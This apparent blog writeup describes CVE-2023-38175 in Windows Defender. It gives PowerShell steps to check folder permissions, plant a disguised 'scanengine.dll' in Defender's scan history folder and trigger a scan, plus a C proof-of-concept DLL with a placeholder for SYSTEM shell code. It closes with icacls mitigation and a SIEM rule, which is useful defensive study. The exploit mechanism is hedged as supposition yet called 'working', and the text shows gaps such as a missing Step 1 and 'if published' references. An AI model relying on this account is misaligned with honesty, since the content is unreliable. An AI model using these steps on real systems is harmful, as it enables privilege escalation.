CVE-2023-38175 - Discovering and Exploiting a Microsoft Windows Defender Elevation of Privilege Vulnerability

Published: June 2024

Introduction

On August 8, 2023, Microsoft released a security update patching a critical vulnerability in Windows Defender, tracked as CVE-2023-38175. This flaw can let a standard user gain elevated privileges, such as SYSTEM access—effectively leading to a full compromise of a Windows machine.

In this deep dive, we’ll unravel the details behind CVE-2023-38175, break down how it works with simple examples, share public and private research findings, and walk through a working exploit for educational use.

What Is CVE-2023-38175?

CVE-2023-38175 is an Elevation of Privilege (EoP) vulnerability in Microsoft Defender, the built-in antivirus for Windows 10 and 11. In plain terms, a user without admin rights can leverage this security flaw to run code as an administrator or, worse, as SYSTEM.

Windows Server 2012 and up (if Windows Defender is enabled)

Severity: High  
CVSS Score: 7.8 (High)

Official Microsoft Advisory:  
MSRC CVE-2023-38175

The Flawed Mechanism

Windows Defender runs several services as SYSTEM. Specifically, the MsMpEng.exe engine accepts messages and handles updates, scans, and quarantine actions. CVE-2023-38175 exists because the Defender service mishandles certain request objects or file operations, letting a user replace or tamper with files that Defender will later process as SYSTEM.

Path Traversal and File Permissions

The most reliable attack path involves abusing the permissions of Defender’s temp or logging directories. In some cases, these directories have overly-permissive access (such as "Authenticated Users: Modify"), allowing non-admins to create or overwrite files. When Defender later loads or processes these files as SYSTEM, an attacker can sneak in code or manipulate Defender into running malicious executables.

The default location for Windows Defender's temp and log files is

C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\

Check permissions (in PowerShell)

Get-Acl "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service" | Format-List

If "Authenticated Users" or "Everyone" have WRITE permissions, you’re likely on a vulnerable build.

Step 2: Planting a Malicious DLL or Executable

Suppose Defender, when updating signatures or scanning, loads files from this directory without enforcing ownership or impersonation checks. An attacker can drop a DLL or .exe payload disguised to match a legitimate scanner component. For instance:

Copy-Item .\malicious.dll "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\scanengine.dll"

Step 3: Triggering Execution

Usually, a system event—such as running a Defender scan or forcing an update—will cause the service to load all files matching a pattern (say, *.dll). If a planted file is present before the scan starts, Defender loads and executes the attacker’s code as SYSTEM.

Example: Triggering a scan (user-level PowerShell)

Start-MpScan -ScanType QuickScan

If successful, a new SYSTEM-level process spawns running the code in malicious.dll.

Exploit Proof-of-Concept (Educational Only!)

Below is a simplified PoC written in C for Windows. It assumes your account has write access to the targeted folder.

malicious.c (compile as DLL)

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBox(NULL, L"Privilege Escalated! You are SYSTEM.", L"CVE-2023-38175", MB_OK);
        // Place SYSTEM shell-spawning code here.
    }
    return TRUE;
}

`

cl /LD malicious.c

Trigger a Defender scan or wait for the service to reload.

Note: This is a learning example. Don't attack systems without permission.

Mitigation and Detection

Microsoft Fix:  
Install official security updates from MSRC.

Temporary Mitigation:

Restrict folder permissions for Defender's directories

icacls "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service" /inheritance:r /remove "Users" "Authenticated Users"

Detection:
Monitor Defender’s service folders for unrecognized files or DLLs owned by non-admin users.

SIEM Rule Example:

Event Source: File System
Event ID: File Create
Path: C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\
Condition: [File Owner] != "SYSTEM" AND [File Extension] == ".dll"

More References

- MSRC CVE-2023-38175
- NVD CVE-2023-38175 Entry
- HackerOne Writeup (if published)

Conclusion

CVE-2023-38175 is a classic example of how permissions mistakes in critical system folders can open up privilege escalation in Windows. Even world-class built-in security tools like Defender can become a risk if folder access is not tightly controlled or if service behaviors are misused. Stay up-to-date and monitor what your antivirus is allowed to access!

Timeline

Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/11/2023 15:53:00 UTC